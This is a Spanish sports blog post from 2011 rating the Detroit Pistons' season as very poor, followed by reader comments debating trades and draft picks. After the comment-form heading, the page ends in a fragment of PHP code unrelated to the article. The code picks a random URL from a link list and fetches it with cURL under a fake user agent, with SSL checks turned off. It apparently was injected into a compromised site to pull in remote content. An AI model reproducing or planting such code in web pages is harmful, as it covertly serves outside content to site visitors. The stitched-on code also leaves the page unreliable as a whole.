Detroit Pistons: Muy deficiente

16 de June de 2011 por txusma

Tan solo 2 equipos de los 6 que el año pasado fueron calificados con un ‘Muy deficiente’ repiten nota. Los Pistons, que ganaron un anillo en 2004 y se clasificaron para Playoffs durante 8 temporadas consecutivas la pasada década disputando hasta 6 finales de conferencia y dos finales absolutas, son uno de ellos. ¿A que puede deberse semejante hecatombe?

El año pasado el equipo hizo el ridículo debido en parte al mal rendimiento de los fichajes (Ben Gordon y Charlie Villanueva) y a la poca implicación de los Hamilton, Prince, Wallace y compañía. Parecía que la cosa no podía ir a peor pero, a pesar de haber mejorado su récord, la imagen ofrecida este año ha sido pésima. Nuestro compañero MagicJohnson32 dedicó un especial de ‘Reflexiones sobre la bocina’ a la franquicia de Michigan y nos presentó los grandes problemas que arrastra. Una espiral autodestructiva iniciada con la venta de Chauncey Billups, una incomprensible gestión del vestuario llevada a cabo por el entrenador John Kuester y una actitud muy poco profesional de varios jugadores han dejado a los Pistons al nivel más bajo que recuerda un servidor.

Lo mejor: Que John Kuester ya no es entrenador de los Pistons. Y sin duda, la calidad y el futuro de Greg Monroe.

Lo peor: La imagen ofrecida durante toda la temporada y sobretodo en febrero con la ausencia de varios jugadores en el entrenamiento y la falta de respeto de Stuckey, Wallace y McGrady en el partido posterior hacia el entrenador, John Kuester. De todas maneras, el trabajo de Kuester como técnico también ha sido difícil (por no decir imposible) de comprender.

Jugando a GM:

Tayshaun Prince es un jugador muy válido pero seguro que tiene sus miras puestas en algún equipo con opciones reales de anillo. Ni me planteo la renovación.

¿Qué hacer con Rodney Stuckey? Cualidades tiene pero su falta de madurez y profesionalidad no me han gustado nada. No lo renovaría si se sube mucho a la parra y la parra no está para aguantar más de 9 kilos por temporada. De todas maneras, si finalmente renuevo a Stuckey por un contrato razonable sería totalmente consecuente. Borrón y cuenta nueva y a rodear a Stuckey de un buen grupo porque ha demostrado que puede llegar lejos.

– Si no lo hemos renovado podríamos explorar un intercambio RIP Hamilton-Baron Davis con los Cavs. Los salarios cuadran y ambos equipos compensarían sus plantillas.

– Podemos intentar desprendernos de los contratos de Hamilton, Gordon o Villanueva juntándolos con la elección número 8 del draft a cambio de practicamente nada. Hay varios rumores en este sentido.

– Pondría toda la confianza sobre Greg Monroe (que debería ser titular indiscutible) y daría muchos minutos a Jonas Jebreko y Austin Daye, al menos para comprobar si valen o no valen para la NBA, sobretodo en el caso del de Gonzaga al que se le ven cualidades pero no termina de explotar.

– Si llegado el día del draft aún tuviera la elección número 8 habría que pensar qué escoger con ella. Me gusta Jan Vesely pero es de un perfil muy similar al de Austin Daye. De hecho, a los Pistons les faltan tantas cosas que un base como Kemba Walker, un escolta como Alec Burks o un PF/C como Bismack Biyombo o Jonas Valanciunas puede ser interesante.

Comenta

13 comentarios a esta entrada

  1. HisRoyalAirness dice:
    #1

    A los Lakers les venía Prince de perlas…

    Yo lo que haría aquí sería una criba de proporciones bíblicas, me desaría de absolutamente todo (menos Monroe y, quizás, Stuckey) y a empezar de cero. Tienen que sanear el vestuario porque hay una mafia acomodada con la que no se puede trabajar

      Citar

  2. TheDeerHunter dice:
    #2

    Para mí es el equipo más lamentable del curso. Otros han perdido más partidos pero ellos son los que mayor ridículo han hecho…
    Porque además es que han tenido suerte, porque con la vergüenza de baloncesto que han desplegado aún se han quedado a 7 victorias de postemporada. Les ha salido bien Monroe; Stuckey&Hamilton, que son los más vilipendiados por Kuester han sido los mejores del equipo y se puede decir que demasiado han cumplido; McGrady ha dado bastante mejor rendimiento de lo que muchos esperaban ¡y de base si hacía falta!!!
    Lo más normal en las circunstancias en las que se ha movido el equipo es que: 1)El entrenador lo hubieran tirado a mitad de curso y/o 2)Se hubieran comido alrededor de 60 derrotas.

    Yo si fuera GM de Detroit no renovaría a Stuckey. Me parece que su caso allí no tiene demasiada vuelta atrás y con todo lo que ha pasado desconfío mucho de su compromiso.
    Me quedaría con la base de Monroe, Jerebko, Daye y puede que Bynum.
    También me comería el contrato de Hamilton rezando porque con todo lo que se le ha maltratada le quede alguna gota de profesionalidad y de ganas. En mi opinión es el único que tiene bula por ser quien es y por ser el único que se ha ganado vivir de gorra allí como poco, no por otra cosa.
    Prince, como dices debería volar de allí y no creo que seguir allí sea ni mucho menos su objetivo.

    Del resto trataría de deshacerme por lo civil o por lo criminal. Regalar lo que se pueda regalar (el expiring de 5 kilos de Maxiell y la ronda pueden ser las mejores monedas de cambio) y traer piezas de reconstrucción puras y duras. Contratos cortos en la medida de lo posible y jugadores prescindibles.
    Mientras termina la condena de contratos post-Billups no les irá mal estar 2-3 años bien colocados en la lotería. Antes no tengo grandes esperanzas de que puedan salir del agujero, más o menos profundo.

      Citar

  3. Viva_Dirk dice:
    #3

    Si se queda a Stuckey tienen que saber lo primero si es un base o un escolta, no es compatible con los mejores exteriores del draft y su renovación puede salir muy cara. Vamos yo no haría muchos esfuerzos por el.

    Monroe debe ser el jefe en cuanto a galones el año que viene, que vean si vale para jugador importante en la pintura y a partir de ahí completar con picks altos y hueco salarial, porque Detroit si atrae a agentes libres.

      Citar

  4. CAMPO2 dice:
    #4

    -Mando a Hamilton mas mi elección de Draft a Minnesota a cambio de su pick 2.
    -Eligo a derrick Williams
    -Mando a Prince a Clippers por Kaman
    -Renuevo a McGrady, Jerebko y Summers(que no se ni de que juega)
    -A Wilcox le doy Boleto e intento traspasar a Maxiel por algun escolta defensivo
    -Villanueva y Bynum por Nelson y algo para cuadrar salarios( creo que esta no colaria)

    Quinteto: Nelson, Gordon, Williams, Monroe, Kaman
    Suplentes: Stucky, McGrady, Daye, Jerebko, Wallace

    El reto de la plantilla de palmeros

      Citar

  5. Txusma dice:
    #5

    Prince queda libre así q no lo puedes traspasar. De todas maneras un Prince x Kaman no colaría de ninguna de las maneras.
    El hamilton + 8ª x 2ª no se puede hacer directamente. Se necesitaría q Cavs o Raptors estuvieran por el medio para asumir el contrato de Hamilton.
    No es fácil esto de hacer de GM 😀

      Citar

  6. CAMPO2 dice:
    #6

    La verdad que no.

    Lo de Prince lo apaño con un sing and trade e incluyo algo de relleno.

      Citar

  7. TheDeerHunter dice:
    #7

    Muy alto apuntas.
    Esa plantilla tiene buena pinta… pero diría que hay varias cosas que no cuadran.
    – El trade Hamilton+Pick por el pick 2 no es viable por el límite comprometido de los Wolves. Renovando a Stuckey y los que propones el límite también quedará comprometido por los Pistons.
    – Para traspasar a Prince por Kaman primero tendrías que renovarle y ya estaría sonao Prince de renovar sabiendo que lo pueden largar a un equipo como los Clippers en estos momentos.
    – Renovación de T-Mac, Jerebko y Summers… ok
    – Wilcox y Maxiell fuera… muy lógico.
    – Villanueva y Bynum por Nelson. Se puede terminar cuadrando salarialmente… pero sólo le faltaba a Stuckey ese cambio para terminar de rematar sus intenciones de renovación.

      Citar

  8. Txusma dice:
    #8

    Y exactamente pq los Magic han de aceptar ese traspaso? Para que quieren a Villanueva y Bynum? Bueno, para quien quiere alguien a Villanueva??

      Citar

  9. CAMPO2 dice:
    #9

    A Villanueva para jugar de falso 4 aunque como dices un jugador como Villanueva y con ese contrato no lo empaquetas hasta que este en ultimo año de contrato

      Citar

  10. TheDeerHunter dice:
    #10

    Claro, la pregunta claves es ¿para qué quiere alguien a Villanueva? pero suponiendo una versión buena de si mismo (y es mucho suponer) es un jugador que puede funcionar muy bien al lado de Howard. Diría que se podrían complementar muy bien por características teóricas (y es mucho teorizar en el caso de Villanueva)
    Además visto lo visto los Magic tampoco es que le tengan mucho miedo a comerse contratos bizarrísimos.

      Citar

  11. Txusma dice:
    #11

    Villanueva es una copia de Rashard Lewis y no sé si decir mala copia. Y ya hemos visto donde ha acabado Lewis este año y a cambio de qué. Lo q está claro es que Villanueva, por si solo, no tiene ningún valor así q es imposible traspasarlo a cambio de Nelson por ejemplo. Lo has de empaquetar junto la elección número 8 como mínimo.

      Citar

  12. TheDeerHunter dice:
    #12

    Incido en lo dicho: “se puede terminar cuadrando salarialmente”. No he dicho que me parezca un trade ideal ni en un sentido ni en otro. La única ventaja para Detroit es largar a Villanueva, que no es poco, ya que está demostrado que no sirve ni para ese esquema ni para ese rol de pseudo-estrella o referencia interior importante que se pretendía cuando lo ficharon.
    Sin embargo también te recuerdo que al lado de Bogut jugó muy bien y se podría estrapolar algo así junto a Howard. Para mí está más definido como 4 que Lewis, aunque tampoco creo que sea tan solvente como el Lewis que vimos durante el año de la última final de Orlando.

      Citar

  13. CAMPO2 dice:
    #13

    Villanueva se caracteriza por su irregularidad, aunque ultimamente sea regular pero por malo, yo creo que cualquier 4 con buena mano para el tiro de media larga distancia se forra junto a Howard.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>